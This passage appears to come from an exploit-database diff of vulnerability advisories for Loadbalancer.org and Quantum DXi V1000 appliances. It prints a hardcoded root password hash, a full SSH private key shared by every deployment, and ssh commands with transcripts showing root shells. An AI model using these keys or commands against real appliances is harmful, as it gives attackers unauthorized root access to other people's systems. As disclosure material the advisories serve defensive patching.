 t0LkViOi2ErHJt39aRJJ1lDRa/3q0NNqZH4tnj/bh5dUyNapflJiV94N3637LCzW
 cFlwFtJvD22Nx2UrPn+YXrzN7mt9qZyg5m0NlqbyjcsnCh4vNYUiNeMTHHW5SaJY
 TeYmPP8CgYAjEe5+0m/TlBtVkqQbUit+s/g+eB+PFQ+raaQdL1uztW3etntXAPH1
 MjxsAC/vthWYSTYXORkDFMhrO5ssE2rfg9io0NDyTIZt+VRQMGdi++dH8ptU+ldl
 2ZejLFdTJFwFgcfXz+iQ1mx6h9TPX1crE1KoMAVOj3yKVfKpLB1EkAIUCsG3dIJH
 SzmJVCWFyVuuANR2Bnc=
 -----END DSA PRIVATE KEY-----
 SSH to the Loadbalancer.org VM using this key:
 $ ssh -i lb root@192.168.2.21
 Last login: Wed Jan 29 09:12:10 2014 from 192.168.2.72
 -bash: warning: setlocale: LC_CTYPE: cannot change locale (UTF-8)
 [root@lbmaster ~]# id
 uid=0(root) gid=0(root)
 groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
 [root@lbmaster ~]#
 -----------
 Solution:
 -----------
 Upgrade to version 7.5.3 or newer
 --------------
 Timeline:
 --------------
 30-01-2014 - Issues discovered and vendor notified
 15-01-2014 - Vendor replies, also made patch available.
 17-03-2014 - Public disclosure
--- a/platforms/unix/remote/32372.txt
+++ b/platforms/unix/remote/32372.txt
@ -0,0 +1,95 @@
 -----------
 Author:
 -----------
 xistence < xistence[at]0x90[.]nl >
 -------------------------
 Affected products:
 -------------------------
 Quantum DXi V1000 2.2.1 and below
 -------------------------
 Affected vendors:
 -------------------------
 Quantum
 http://quantum.com/
 -------------------------
 Product description:
 -------------------------
 Quantum DXi® V-Series is a virtual deduplication backup appliance that
 protects physical and
 virtual data across remote sites, the datacenter and cloud deployments.
 ----------
 Details:
 ----------
 [ 0x01 - Default root user ]
 The root user has a hardcoded password that is unknown and not changeable.
 Normally access is only through the restricted shells.
 The /etc/shadow file shows the following hash:
 root:$1$FGOgdWM7$dac9P0EJgTSX8a4zc4TXJ/:15783:0:99999:7:::
 [ 0x02 - Known SSH Private Key ]
 The /root/.ssh/authorized_keys on the appliance contains the following key
 (same with every deployment):
 -----BEGIN DSA PRIVATE KEY-----
 MIIBugIBAAKBgQCEgBNwgF+IbMU8NHUXNIMfJ0ONa91ZI/TphuixnilkZqcuwur2
 hMbrqY8Yne+n3eGkuepQlBBKEZSd8xPd6qCvWnCOhBqhkBS7g2dH6jMkUl/opX/t
 Rw6P00crq2oIMafR4/SzKWVW6RQEzJtPnfV7O3i5miY7jLKMDZTn/DRXRwIVALB2
 +o4CRHpCG6IBqlD/2JW5HRQBAoGAaSzKOHYUnlpAoX7+ufViz37cUa1/x0fGDA/4
 6mt0eD7FTNoOnUNdfdZx7oLXVe7mjHjqjif0EVnmDPlGME9GYMdi6r4FUozQ33Y5
 PmUWPMd0phMRYutpihaExkjgl33AH7mp42qBfrHqZ2oi1HfkqCUoRmB6KkdkFosr
 E0apJ5cCgYBLEgYmr9XCSqjENFDVQPFELYKT7Zs9J87PjPS1AP0qF1OoRGZ5mefK
 6X/6VivPAUWmmmev/BuAs8M1HtfGeGGzMzDIiU/WZQ3bScLB1Ykrcjk7TOFD6xrn
 k/inYAp5l29hjidoAONcXoHmUAMYOKqn63Q2AsDpExVcmfj99/BlpQIUYS6Hs70u
 B3Upsx556K/iZPPnJZE=
 -----END DSA PRIVATE KEY-----
 Using the key on a remote system to login through SSH will give a root
 shell:
 $ ssh -i quantum.key root@192.168.2.117
 Last login: Mon Sep 23 21:27:19 2013 from 192.168.2.71
 Product Model          = DXiV1000
 Hardware Configuration = V1000
 System Version         = 2.2.1_MC
 Base OS Version        = 2.2.1_MC-9499
 Application Version    = 2.2.1_MC-50278
 SCM Build Version      = Build14
 Kernel Version         = 2.6.18-164.15.1.qtm.4
 [root@DXi000C29FB1EA1 ~]# id
 uid=0(root) gid=0(root)
 groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),103(adic)
 -----------
 Solution:
 -----------
 Upgrade to version 2.3.0.1 or newer
 --------------
 Timeline:
 --------------
 30-09-2013 - Issues discovered and vendor notified
 30-09-2013 - Reply from vendor asking for more details
 01-10-2013 - Supplied more details how to replicate
 19-11-2013 - Asked for status update
 19-11-2013 - Reply from vendor that an updated release is due for March 2014
 xx-xx-2014 - Quantum DXi V1000 2.3.0.1 released
 17-03-2014 - Public disclosure